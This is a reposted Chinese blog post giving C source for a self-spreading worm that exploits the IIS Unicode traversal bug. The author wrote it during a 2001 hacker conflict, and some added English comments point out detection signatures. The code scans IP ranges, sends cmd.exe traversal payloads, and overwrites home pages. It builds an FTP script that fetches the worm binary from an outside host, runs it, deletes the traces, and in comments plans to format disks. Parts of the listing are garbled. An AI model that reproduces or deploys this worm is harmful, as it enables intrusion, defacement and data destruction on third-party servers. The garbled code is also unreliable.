掃描UNICODE漏洞傳播、攻擊的蠕蟲原始碼 (轉)
在5.1期間的中美戰中,聯盟的網站中,+IIS+UNICODE主機佔90%。(美國的poizenBOx同樣是利用這個UNICODE漏洞攻擊我國的主機)
詳細請見
下面是我和zhaowuqing寫的一個利用該漏洞的。跟LION蠕蟲有些相象,都需要把自己寄存到某個主機上、、、、、、
執行:直接執行(無引數)將掃描本機IP開始的100個主機,並修改首頁、傳播
帶引數執行 :202.97.233.0 202.97.233.254 這將掃描該IP段的主機並實施攻擊。
下面貼
forget to link with wsock32.lib :-o
#include
#include
義常量
// Shared scanner state. num and ExeDirNum are read and written by the FindExeDir
// worker threads with no synchronization; hSemaphore is created by main().
int num=0;                 // index into hole[] of the encoding currently being tried
int ExeDirNum=0;           // last ExeDirs[] index FindExeDir advanced to
HANDLE hSemaphore=NULL;    // throttles the number of concurrent worker threads (see main)
MaxThread=100;// at most 100 concurrent scanning threads (declared with no type — implicit int)
面定義漏洞陣列
// Candidate traversal sequences. Each entry is a percent-encoded, non-canonical
// multi-byte encoding of a path separator; FindExeDir prefixes eight ".." + entry
// pairs to a request for /winnt/system32/cmd.exe and checks whether the server
// executed it — the IIS "Unicode" directory-traversal bug the page title refers to.
// Several entries are exact repeats; FindExeDir simply retries them.
// Detection: any of these byte sequences in a request URI, especially next to
// "cmd.exe?/c", is a high-fidelity IDS/WAF signature with essentially no benign use.
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
// single-separator variants
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
// three-, four-, five- and six-byte overlong forms
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
// pre-built multi-level traversals
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};
面7個漏洞出現的目錄,可以自己定義更多,但務必修改後改下面的for迴圈數字
// Virtual directories the author expects to be script-enabled on the target.
// FindExeDir walks indices 0..6 (its `exenum<6` guard is tied to this size; the
// comment above warns to change that loop bound if entries are added).
// Detection: requests to any of these paths that continue with a traversal
// sequence and "/winnt/system32/cmd.exe" are this scanner's probe.
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};
明
// Forward declarations and the globals the worker threads fill in.
long GetLocalIP(void);// this machine's IPv4 address, network byte order
D WIN FindExeDir(LPVOID lp);// worker thread: find an executable directory on one host (return type garbled in this listing)
char *GetData(int SockFD);// read the reply to a sent request into a malloc()ed buffer
char * find(const char*psz,const char * pszKey);// locate pszKey in the reply and return the text after it
char *localpath;// directory of cmd.exe on the target, parsed from the "dir" output
char *exedir;// the ExeDirs[] entry that was found to execute
char* Path;// directory holding the home page (FindExeDir writes a `WebPath`, which has no declaration in this listing)
序入口
// Entry point. With no arguments: scan the 100 addresses starting at this
// machine's own IP (the mode a freshly infected host runs in) and never exit.
// With two arguments: scan the inclusive dotted-quad range argv[1]..argv[2] once.
// One FindExeDir thread is started per address, throttled by hSemaphore.
// Network footprint for defenders: a sweep of sequential TCP/80 connects across
// a contiguous address block, started 10 ms apart, up to MaxThread in flight.
int main(int argc, char **argv)
{
HANDLE hThread=NULL;
DWORD dwThreadID;
long Previouunt;   // name garbled in this listing; used below as PreviousCount
int i;
int Star;          // name garbled in this listing; used below as StartNet
int StopNet;
int StartHost;// first address of the range, host byte order
int StopHost;// last address of the range, host byte order
WSADATA wsaData;
struct in_addr host;
Wtartup(0x202, &wsaData );   // Winsock 2.2 startup (name garbled in this listing)
if(argc<2)// no arguments: scan the 100 hosts starting from the local IP
{
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
}
else// arguments given as: iis 202.97.56.3 202.97.56.254 — take them as the IP range
{
StartNet=inet_addr(argv[1]);
StopNet=inet_addr(argv[2]);
}
// inet_addr() yields network byte order; convert so the for loop below can count
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{
host.S_un.S_addr =_addr(argv[1]);   // inet_addr (garbled); `host` is not read afterwards
WSAStartup(0x202, &wsaData );
// MaxThread slots; main() takes one per thread it starts
hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{
printf("nCreateSemaphore failed:%d",GetLastError());
;
}
// one worker per address; the address is passed as the thread parameter
for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
if(hThread==NULL)
{
printf("nCreate thread failed:%d",GetLastError());
break;
}
printf(".");
Sleep(10);
CloseHandle(hThread);
// take a slot (name garbled; WaitForSingleObject). No ReleaseSemaphore appears
// inside FindExeDir in this listing, so the slots are only given back below.
WaitForSingle(hSemaphore,INFINITE);
}
// Wait until the semaphore count is back at its maximum, i.e. all slots free
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
printf("nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
printf("nAll done.");
break;
}
Sleep(500);
}
// exedir / localpath are set by whichever worker last found an executable directory
printf("發現可執行目錄. [%s]n", exedir);
printf("可執行目錄是 [%s]n",localpath);
CloseHandle(hSemaphore);
WSACleanup();
}
while(argc<2);// no arguments means we are running on a compromised host: repeat the sweep forever
return 0;
}
// Return this machine's IPv4 address in network byte order — the last entry of
// the local host-name lookup — or 0 if gethostbyname() fails. Prints the host
// name and every address found as a side effect.
long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
printf("%sn",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
printf("%sn",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
// after the loop i is one past the last address, so i-1 is the final entry
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}
// Worker thread for one target (lp = IPv4 address in host byte order, as an int).
// Probes the host for the IIS Unicode directory-traversal bug and, when cmd.exe
// runs, overwrites its home pages and installs a copy of the worm. Always returns 0.
// Every step is a plain HTTP/1.0 request to TCP/80 that drives cmd.exe through the
// request line, so each one is recorded in the target's IIS log as a request
// containing "/winnt/system32/cmd.exe?/c" — the simplest detection pivot.
// Host artifacts left behind: rewritten default.asp / index.asp / index.html /
// default.htm in the web root, srv.exe in winnt\system32, and an outbound FTP
// session from the web server to home4u.china.com (up.txt is written, used, then deleted).
DWORD WINAPI FindExeDir(LPVOID lp)
{
int host=(int)lp;
u_short port=80;
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[500],uniwaste[500];   // waste: outgoing request; uniwaste: the traversal prefix
char *buffer,*p;
char space[3];                   // "%20", an encoded space for the command line
char dletter[2];// drive letter taken from the path cmd.exe reported (see strncpy below)
char asc[3];                     // "%3E" (encoded '>'); built but never used below
int rbytes=0,loc1=0,loc2=0;
char locdir[300];                // directory name parsed out of the "dir" output
int exenum=0;                    // index into ExeDirs[] currently being tried
// Retry label (its name is lost in this listing; the two `goto crack` statements
// at the end jump here to try the next encoding or the next directory).
:
memset(locdir,0,300);
memset(uniwaste,0,499);
memset(space,0,3);
strcpy(space,"%20");
memset(asc,0,3);
strcpy(asc,"%3E");
printf("查詢漏洞%d...n",host);
// Build the traversal prefix: eight ".." + hole[num] segments.
for(i=0;i<8;i++)
{
strcat(uniwaste,"..");
strcat(uniwaste,hole[num]); unicode碼和URL結合起來.
}
memset(waste,0,500);
our string that sees if we can execute cmd.exe
way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
// Probe request: GET /<dir>/<traversal>/winnt/system32/cmd.exe?/c%20dir
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("Trying directory [%s]n", waste);
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
// "Directory of" in the reply means cmd.exe actually ran the dir command
p=strstr(buffer,"Directory of"); 到了cmd.exe的目錄!!!
if(p!=NULL)
{
loc1=p-buffer+1;
// second marker string is lost in this listing
p=strstr(buffer,"
if(p!=NULL)
{
loc2=p-buffer+1;
loc2=loc2-27;
buffer[loc2-2]='';
// cut the directory name out of the dir output
strncpy(locdir,buffer+loc1+12,290);
executable directory.
// record which ExeDirs[] entry worked (global, malloc()ed, never freed here)
exedir=malloc(strlen(ExeDirs[exenum])+1);
memset(exedir,0,strlen(ExeDirs[exenum])+1);
memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
executable directory path
// record the directory cmd.exe lives in (global, malloc()ed, never freed here)
localpath=malloc(strlen(locdir)+1);
memset(localpath,0,strlen(locdir)+1);
memcpy(localpath,locdir,strlen(locdir));
closesocket(SockFD);
詢首頁位置
// Second request: cmd.exe?/c set dumps the CGI environment; PATH_TRANSLATED
// gives the web root, which becomes WebPath for the defacement writes below.
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
WebPath=find(buffer,"PATH_TRANSLATED=");// the `set` output above reveals the host's web root
中找到WEB目錄,用來修改首頁
closesocket(SockFD);
// first character of the cmd.exe path is the drive letter
strncpy(dletter,localpath,1);
dletter[1]='';
printf("首頁路徑%sn",WebPath);
}
// Defacement, four requests: echo a fixed string over each common home-page
// file name in WebPath. (The `cmd".exe` in these format strings is garbled.)
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀default.>+%sdefault.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁default.asp n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("Access is denied");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.asp>+%sindex.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁index.asp n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("不能修改,屬性有問題");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.html>+%sindex.html HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁index.html n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
// note: this one is `=` rather than `!=`, unlike the other three checks
if(p=NULL)
{
printf("不能修改,檔案屬性有問題");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀和~~~default.htm>+%sdefault.htm HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁default.htm n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("不能修改,檔案屬性有問題");
}
closesocket(SockFD);
}
接到FTP主機
// Propagation, stage 1: build an FTP script line by line in
// <drive>:\winnt\system32\up.txt (the backslashes are lost in this listing).
// Line 1 — open home4u.china.com
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+open+home4u.china.com>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("連線到FTP主機 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
登陸
// Line 2 — FTP user name
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+111222>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("登陸USER:111222n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
碼輸入
// Line 3 — FTP password
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+mmipip>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("密碰:mmipn");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
FILE
// Line 4 — get srv.exe (the worm binary itself)
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+get+srv.exe>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("srv.exe n");// download a copy of the worm (srv.exe) to the vulnerable host and run it
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
出ftp主機
// Line 5 — quit
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+quit>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("退出FTP主機 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
始FTP
// Propagation, stage 2: run `ftp -s:up.txt` on the target (the "%tp" in the
// format string is garbled). This is the outbound FTP session a defender would
// see from the web server.
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%tp+-s:up.txt>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("下載檔案 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Error");
if(p!=NULL)
{
printf("FTP結束");
}
closesocket(SockFD);
}
除del.txt避免在主機上留有FTP資訊
// Anti-forensics: delete the FTP script. For IR, up.txt is transient but the
// IIS log entries, the FTP traffic and srv.exe itself remain.
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%sdel+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("刪除FTP痕跡 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"access is");
if(p!=NULL)
{
printf("刪除失敗");
}
closesocket(SockFD);
}
行
// Propagation, stage 3: launch srv.exe on the target through cmd.exe. A
// "CGI Error" reply is taken as success (the process did not return output).
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%ssrv.exe HTTP/1.0nn",ExeDirs[exenum],uniwaste);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("在主機上執行自己 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"CGI Error");
if(p!=NULL)
{
printf("執行成功");// at this point the newly infected host starts scanning the addresses near its own
}
closesocket(SockFD);
}
1;
}
}
// Retry logic: walk all 24 encodings in hole[] for the current directory, then
// move to the next of the 7 ExeDirs[] entries and start the encodings over.
if(num<23)// cycle through the encodings
{ num++;
closesocket(SockFD);
goto crack;
}
else
{
if(exenum<6)// walk the directory list
{
num=0;
exenum++;
ExeDirNum=exenum;
closesocket(SockFD);
goto crack;
}
closesocket(SockFD);
}
// Only a message here; the destructive step the garbled comments below describe
// (format via autoexec.bat and reboot) is not implemented in this listing.
printf("掃描全部結束,在此應該進行破壞性操作...n");
選辦法,在目標主機上的autoexec.bat里加上格式化命令
後執行ExitSystem(1);使主機重新啟動
新啟動後格式化硬碟
}
return 0;
}
返回的資料中查詢指定資訊
// Locate pszKey in pszSource and return the text that follows it, up to the next
// "rn" (a CRLF literal whose backslashes are lost in this listing) or to the end
// of the string. Returns NULL when the key is absent.
// The result lives in a static buffer, so the function is not reentrant and the
// returned pointer is overwritten by the next call; the strncpy() copies q-p
// bytes without checking against sizeof szBuffer and does not add a terminator.
char* find(const char*pszSource,const char* pszKey)
{
static char szBuffer[2049];
const char * p;
const char * q;
p = q = NULL;
p = strstr(pszSource,pszKey);
if ( p != NULL )
{
p += strlen(pszKey);   // skip past the key itself
q = strstr(p,"rn");
if ( q == NULL )
q = p + strlen(p);     // no line end: take the rest of the string
strncpy(szBuffer,p,q-p);
return szBuffer;
}
return NULL;
}
// Read whatever the server sends on SockFD and return it in a freshly
// malloc()ed 2000-byte buffer owned by the caller (no caller in this listing
// frees it). The socket is switched to non-blocking and polled up to nine
// times, 500 ms apart, so a server that never answers does not hang the worker.
char *GetData(int SockFD)
{
data without a blocking recv so we dont hang if we crash the server
char *buffer;
char data[2001];
unsigned long on=1;
unsigned long off=0;
char waste[2001];
int p, i=1;
int t;
memset(data,0,2001);
p=ioctlsocket(SockFD,FIONBIO,&on);   // non-blocking mode; result p is not checked
memset(waste,0,2001);
// poll: first successful recv() wins, otherwise give up after ~4.5 s
for(t=1;t<10;t++){
i=recv(SockFD, waste, 2000, 0);
if(i>0)
break;
Sleep(500);
}
waste[i]='';   // terminator literal is garbled in this listing
strncat(data,waste,2000);
buffer = ( char * )malloc( 2000 * sizeof( char ) );
strncpy( buffer, data, 2000 );
return buffer;
}
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-995566/,如需轉載,請註明出處,否則將追究法律責任。